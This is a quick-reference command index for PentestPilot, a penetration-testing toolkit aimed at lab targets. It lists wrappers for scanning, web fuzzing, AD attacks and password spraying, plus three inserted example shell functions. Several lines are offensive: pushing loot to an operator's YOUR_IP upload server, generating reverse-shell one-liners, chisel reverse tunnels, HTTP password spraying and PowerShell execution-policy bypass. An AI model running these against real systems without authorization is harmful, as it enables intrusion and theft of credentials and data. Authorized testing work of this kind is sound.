PentestPilot/TOOLKIT.md
0xMarcio 1ec50d14a3 docs: remove em dashes; convert pseudo-links to real Markdown links; improve formatting
- Replace all em dashes with simple hyphens across repo
- README: real links in Docs Index, badges and headings
- HOWTO: clickable TOC, clean headings, hyphen usage
- TOOLKIT: clickable TOC, cleaned bullets, crosslinks and examples
- Dashboard and pack_report strings updated to avoid em dashes
- .zshrc comment cleaned
2025-10-08 16:11:24 +02:00


PentestPilot - Quick Reference

For step-by-step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md. This file is a categorized command index with succinct usage for each script. Most entries accept TARGET from the environment if the positional argument is omitted.

Setup

  • Keep this repo in a working folder, e.g., htb/.
  • Source the shell helpers from your main zshrc: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
  • Open a new shell or run: source .zshrc.htb

Core Workflow

  • settarget <ip_or_host>
    • Creates the target's directory under targets/ with scans, loot, www and exploits subdirectories.
    • Sets OUTDIR to that target's scans directory.
  • ar → auto_recon: quick scan, optional UDP, basic web enum
  • webrecon → run web_recon on detected web ports
  • wideweb → wide_web_recon on a host list
  • notesinit → scaffold notes.md in target directory
  • notesattach → append scan artifacts summary to notes
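The directory layout and environment that settarget establishes, as an added example (this is not PentestPilot's own settarget helper). The only thing it adds beyond the bullets above is input validation: the target name becomes a directory name, so an unchecked `settarget ../../etc` would create directories outside targets/. The function name and the optional base-directory argument are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not PentestPilot's own settarget. Creates targets/<target>/{scans,loot,www,exploits}
# and exports TARGET and OUTDIR, after refusing names that could escape the base directory.
settarget_example() {
  local target=$1 base=${2:-targets} sub
  case "$target" in
    ''|*[!A-Za-z0-9.-]*|.*|*..*)
      # Only hostname/IPv4 characters, no leading dot, no "..". IPv6 literals
      # would need their own rule and are rejected here.
      echo "settarget: refusing unsafe target name '$target'" >&2
      return 1 ;;
  esac
  for sub in scans loot www exploits; do
    mkdir -p "$base/$target/$sub" || return 1
  done
  export TARGET="$target" OUTDIR="$base/$target/scans"
  printf '%s\n' "$OUTDIR"   # print it so callers can capture where scans will land
}
```

Run it as `settarget_example 10.10.10.5` from the repo root; afterwards `$OUTDIR` is where the nmap wrappers below write their files.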

Enumeration (requires TARGET)

  • nq → Quick nmap: scripts + versions
  • nf → Full TCP: -p- then service/version
  • nu → UDP top 200
  • smb → SMB enumeration (anon by default)
  • snmp → SNMP enumeration (community defaults to public)

Individual scripts (bin/)

  • nmap_quick.sh
  • nmap_full.sh [--rate 5000]
  • nmap_udp.sh [--top 200]
  • smb_enum.sh [user] [pass]
  • ldap_enum.sh [user] [pass] - auto-detect baseDNs
  • nfs_enum.sh
  • ftp_enum.sh
  • snmp_enum.sh [community]

Automation (bin/automation/) (see HOWTO: Automation & Orchestration, Dashboard, Manifest)

  • auto_recon.sh [--no-udp]
  • parse_nmap_open_ports.sh <*.gnmap>
  • report_summary.py <*.gnmap ...>
  • web_recon.sh <target|--url <url>>
  • loot_pack.sh [dir]
  • wide_web_recon.sh <hosts.txt>
  • notes_init.sh
  • notes_attach.sh
  • full_pipeline.sh <domain|hosts.txt> [--resume|--force]
  • manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) [...]
  • dashboard.py [--json]
  • resume_all.py - resume full pipeline across all targets
  • tech_actions.py [--run] - suggest/run next steps based on httpx techs
  • cleanup_scans.sh [dir] [days] [--force] - prune old scan files
  • proxy_toggle.sh on|off [http://host:port]
  • tmux_init.sh [session] - starter tmux layout

See also in HOWTO.md:

  • Automation & Orchestration
  • Dashboard (Status & Evidence)
  • Manifest (State & Resume)

Examples

# One-click pipeline (resume-aware)
full_pipeline.sh target.htb

# Agent-driven full pipeline with auto tech actions
agent full target.htb

# Dashboard
dashboard --compact

# Resume all incomplete targets
resumeall
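What parse_nmap_open_ports.sh has to do, and how auto_recon hands "detected web ports" to web_recon, as an added example (not PentestPilot's scripts). parse_gnmap_open_ports reads greppable nmap output on stdin and prints one "host port proto service" line per open port; gnmap_web_urls turns the http/https ones into URLs. The sample .gnmap lines are constructed; the function names are assumptions.

```shell
# Added example, not PentestPilot's parse_nmap_open_ports.sh / auto_recon.sh.
parse_gnmap_open_ports() {
  # .gnmap fields are tab-separated: "Host: <ip> (<name>)\tPorts: ...\tIgnored State: ..."
  awk -F'\t' '
    /^Host: / {
      host = $1; sub(/^Host: /, "", host); sub(/ .*/, "", host)
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        ports = $i; sub(/^Ports: /, "", ports)
        n = split(ports, entry, ", ")
        for (j = 1; j <= n; j++) {
          # each entry: port/state/proto/owner/service/rpc/version/
          split(entry[j], f, "/")
          if (f[2] != "open") continue          # drops filtered/closed
          printf "%s %s %s %s\n", host, f[1], f[3], (f[5] == "" ? "unknown" : f[5])
        }
      }
    }'
}

gnmap_web_urls() {
  # Pick the http-like services and build URLs; nmap writes "ssl/https" as
  # "ssl|https" inside .gnmap, so a leading "ssl|" also means TLS.
  parse_gnmap_open_ports | while read -r host port proto svc; do
    [ "$proto" = tcp ] || continue
    case "$svc" in
      *https*|ssl\|http*) echo "https://$host:$port" ;;
      *http*)             echo "http://$host:$port" ;;
    esac
  done
}

sample_gnmap() {
  # Constructed sample in nmap's greppable format.
  printf 'Host: 10.10.10.5 ()\tStatus: Up\n'
  printf 'Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, 443/open/tcp//ssl|https//nginx 1.18.0/, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (996)\n'
}
```

Usage against a real scan: `gnmap_web_urls < "$OUTDIR/quick.gnmap" > "$OUTDIR/web_urls.txt"`, then feed that file to the httpx/nuclei helpers below. Splitting on ", " is the same shortcut most quick parsers take; a version string containing ", " would be split, but the port/state/proto prefix is still read correctly from each piece.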

Web helpers (bin/web/) (see HOWTO: Web Recon & Routing)

  • dirbuster.sh <url> [wordlist] [exts] - ffuf directory fuzz
  • vhost_ffuf.sh <url> [wordlist] - virtual hosts
  • param_fuzz.sh <url> [wordlist] - parameter discovery
  • lfi_tester.py - basic LFI checks
  • tech_detect.sh - headers + tech hints
  • http_headers.sh - raw headers
  • url_titles.py <url> [url2 ...] - titles and codes
  • crawl_words.py <url> [depth] - extract words for wordlists
  • sqli_quick.sh - sqlmap wrapper
  • backup_hunter.sh <url> [paths.txt] - find common backups/configs
  • git_dumper.sh <url> [outdir] - mirror exposed .git and restore
  • cors_tester.py <url> [origin] - test ACAO/ACAC
  • methods.sh - show allowed methods (OPTIONS)
  • clone_site.sh <url> [outdir] - wget mirror
  • tls_scan.sh host:443 - openssl-based TLS info
  • robots_grabber.sh - show Disallow entries
  • webdav_detect.sh - OPTIONS + PROPFIND
  • httpx_probe.sh <host|file>
  • nuclei_quick.sh <url|file> [tags]
  • gobuster_dir.sh <url> [wordlist] [exts] [threads]
  • httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
  • httpx_tech_route.py <host|file> [--tech list] [--dry-run]
  • httpx_presets.sh <host|file>
  • gobuster_vhost.sh <url> [wordlist] [threads]
  • wpscan_quick.sh
  • jenkins_quick.sh
  • sonarqube_quick.sh
  • magento_quick.sh
  • droopescan_quick.sh
  • joomscan_quick.sh

See also in HOWTO.md:

  • Web Recon & Routing

Examples

# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt

# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra

# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50

Reverse shells (bin/shells/)

  • revsh.py - prints common one-liners
  • listener.sh - rlwrap + nc/ncat listener
  • tty_upgrade.sh - quick TTY tips

Examples

# Listener
listener.sh 4444

# Oneliners to paste on target
revsh.py YOUR_IP 4444

# Upgrade TTY
tty_upgrade.sh

File transfer (bin/transfer/)

  • http_serve.sh [port] - simple Python HTTP server
  • serve.py [port] - HTTP server with web upload (POST /upload)
  • push_http.sh <file> http://host:port/upload - upload to serve.py
  • dl_oneshots.sh - download one-liners
  • smb_server.sh [share] [path] - impacket SMB server

Examples

# Simple HTTP
http_serve.sh 8000

# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload

# SMB quick share
smb_server.sh share ./loot

Crypto / Text (bin/crypto/)

  • encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
  • jwt_show.py - decode header/payload (no verify)

Examples

encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
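What "decode header/payload (no verify)" involves, as an added example that is not PentestPilot's jwt_show.py. JWT segments are base64url (RFC 4648 section 5) with the "=" padding stripped, so a plain base64 decoder rejects them until "-_" is mapped back to "+/" and the padding is restored. Nothing here checks the signature: the claims become readable, not trustworthy, and an `alg` of `none` or an unexpected value in the header is the first thing to look at. The function names are assumptions; the test token is the common jwt.io sample.

```shell
# Added example, not PentestPilot's jwt_show.py.
b64url_decode() {
  local s pad
  s=$(printf '%s' "$1" | tr -- '-_' '+/')
  pad=$(( (4 - ${#s} % 4) % 4 ))   # "=" characters to restore; a remainder of 1 is malformed input
  while [ "$pad" -gt 0 ]; do s="$s="; pad=$((pad - 1)); done
  printf '%s' "$s" | base64 -d
}

jwt_part() {  # jwt_part <token> <1=header|2=payload|3=signature>
  printf '%s' "$1" | cut -d. -f"$2"
}

jwt_alg() {  # the algorithm the header *claims*; "none" or a surprise here is a red flag
  b64url_decode "$(jwt_part "$1" 1)" | sed -n 's/.*"alg" *: *"\([^"]*\)".*/\1/p'
}

jwt_show() {  # decoded header and payload; the signature is shown but never verified
  printf 'header:    %s\n' "$(b64url_decode "$(jwt_part "$1" 1)")"
  printf 'payload:   %s\n' "$(b64url_decode "$(jwt_part "$1" 2)")"
  printf 'signature: %s (not verified)\n' "$(jwt_part "$1" 3)"
}
```

Usage: `jwt_show "$TOKEN"`. Because the signature is ignored, the output is only useful for reconnaissance (claim names, roles, expiry, key ids); deciding whether the token is valid needs the server's key and a real verifier.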

Privilege Escalation (bin/privesc/)

  • linux_quick_enum.sh - basic local recon
  • suid_scan.sh - list SUID/SGID
  • caps_scan.sh - list file capabilities

Examples

linux_quick_enum.sh
caps_scan.sh

Misc (bin/misc/)

  • cyclic.py create <len> | offset <value> - pattern + offset
  • port_forward.sh - wrappers for ssh -L/-R/-D
  • extract_urls.py <file...>

Examples

cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md

AI (bin/ai/) (see HOWTO: AI Integrations)

  • ask.py [-m model] [-s system] "prompt" | - (stdin)
  • wordlist_from_context.py [context-file|-]
  • orchestrate_web.py <hosts.txt>
  • review_findings.py <notes.md> [extra]
  • commands_planner.py "goal" [context]
  • agent_orchestrator.py - multi-agent runner (web|notes|post|ad)

See also in HOWTO.md:

  • AI Integrations

Examples

# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt

# Orchestrate web for a host list
orchestrate_web.py hosts.txt

# Multi-agent runner
agent web hosts.txt

Active Directory (bin/ad/)

  • getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
  • getspns_wrapper.sh <domain/user:pass> <dc_ip>
  • ldap_quick_users.sh <dc> [user pass]
  • rpc_quick.sh <dc> [user pass] - rpcclient lsa/users/groups
  • kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
  • cme_quick.sh <target> [user pass]

Examples

getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass

Passwords (bin/passwords/)

  • mutate_words.py word1 [word2 ...] | -
  • spray_http_basic.sh <url> <users.txt> <password>
  • merge_dedupe.sh <file1> [file2 ...] - dedup merged lists
  • wordlist_cleanup.sh <file> [min] [max]
  • hash_id.sh - simple guess when hashid missing

Examples

mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!

Windows (bin/windows/)

  • privesc_quick.ps1 - run on target
  • win_share_enum.ps1 -Target <host>
  • find_unquoted_services.ps1 - potential service path issues
  • find_path_writable.ps1 - writable PATH dirs
  • windows_loot.ps1 - targeted loot collector

Examples

powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1

Post-Exploitation (bin/post/)

  • linux_loot.sh - targeted loot collector with size caps
  • windows_loot.ps1 - targeted loot collector (PowerShell)
  • pack_report.sh - merge loot/scans into markdown report

Examples

LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET

DNS (bin/dns/)

  • zone_transfer.sh <domain> [ns]
  • subenum.sh <domain>
  • gobuster_dns.sh <domain> [wordlist] [threads]

Examples

zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100

Scanning (bin/scan/)

  • naabu_quick.sh <target> [flags]
  • masscan_top.sh <target> [rate]

Examples

naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000

Tunnels (bin/tunnel/)

  • chisel_server.sh [port]
  • chisel_client.sh host:port R:<lport>:<rhost>:<rport>
  • autossh_socks.sh user@host [lport]
  • socat_forward.sh -L|-R

Examples

autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80

Pwn (bin/pwn/)

  • pwntools_template.py - starter exploit template

Examples

python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337

Hashes (bin/hashes/)

  • extract_ntlm_from_secretsdump.py <file> [out]
  • john_pfx.sh <file.pfx> - john format for PFX

Examples

extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash

Tips

  • OUTDIR controls where scans are saved; set by settarget.
  • Most scripts accept TARGET via env if argument omitted.
  • If a tool isn't installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
  • For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
  • Use responsibly and only with explicit authorization.
  • Dashboard flags: --no-color, --compact, --json
  • Read HOWTO.md for detailed guidance and examples.